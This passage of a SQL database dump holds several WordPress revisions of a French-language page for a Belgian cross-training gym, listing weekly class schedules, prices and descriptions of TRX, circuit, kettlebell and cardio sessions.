5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:53:40', '2013-07-03 17:53:40', '', 11, 'http://www.crosstrainingcenter.be/?p=202', 0, 'revision', '', 0),
(203, 1, '2013-07-03 17:54:00', '2013-07-03 17:54:00', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\">toto\r\ntiti\r\ntoutou</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:54:00', '2013-07-03 17:54:00', '', 11, 'http://www.crosstrainingcenter.be/?p=203', 0, 'revision', '', 0),
(204, 1, '2013-07-03 17:57:10', '2013-07-03 17:57:10', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\">\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:57:10', '2013-07-03 17:57:10', '', 11, 'http://www.crosstrainingcenter.be/?p=204', 0, 'revision', '', 0),
(207, 1, '2013-07-03 18:03:14', '2013-07-03 18:03:14', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"><strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:03:14', '2013-07-03 18:03:14', '', 11, 'http://www.crosstrainingcenter.be/?p=207', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(208, 1, '2013-07-03 18:04:14', '2013-07-03 18:04:14', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td 